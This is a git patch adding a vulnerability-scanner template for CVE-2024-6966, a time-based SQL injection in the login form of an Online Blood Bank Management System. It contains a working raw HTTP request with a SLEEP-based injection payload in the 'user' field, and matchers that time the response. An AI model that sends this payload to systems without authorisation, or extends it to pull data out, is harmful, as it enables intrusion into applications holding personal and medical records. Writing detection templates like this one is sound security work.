From a42805ff48f4a4dfd81857cc24ababa7ac2bc983 Mon Sep 17 00:00:00 2001
From: cl4irv0yance <mikesmith12137@gmail.com>
Date: Thu, 25 Jul 2024 20:04:28 -0400
Subject: [PATCH] Added template for CVE-2024-6966, issue #10393

---
 cve-2024-6966.yaml | 42 ++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 42 insertions(+)
 create mode 100644 cve-2024-6966.yaml

diff --git a/cve-2024-6966.yaml b/cve-2024-6966.yaml
new file mode 100644
index 00000000000..def1ee9365b
--- /dev/null
+++ b/cve-2024-6966.yaml
@@ -0,0 +1,42 @@
+id: cve-2024-6966
+
+info:
+  name: Itsourcecode Online Blood Bank Management System - Time Based SQL injection in Login Page
+  author: cl4irv0yance
+  description: In the login portal of the Online Blood Bank Management application, it is possible to inject SQL into "user" and exploit time-based SQL injection. 
+  severity: High
+  reference: 
+    - https://github.com/HermesCui/CVE/issues/1
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-6966
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
+    cvss-score: 7.3
+    cve-id: cve-2024-6966
+  tags: sqli,cve,cve-2024,cve-2024-6966,itsourcecode
+
+
+http:
+  - raw:
+      - |
+        @timeout: 25s
+        POST /login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        tab=on&user=tab%3Don%26user%3D123321%27+AND+%28SELECT+8755+FROM+%28SELECT%28SLEEP%2810%29%29%29xGkg%29+AND+%27emTj%27%3D%27emTj%26pass%3D123123%26sub%3DLog+In%22&pass=test&sub=Log+In
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Username'
+          - 'Password'
+          - 'Keep me Signed in'
+          - 'Forgot Password'
+          - 'Wrong email or password'
+        condition: and
+
+      - type: dsl
+        dsl:
+          - 'duration>=10'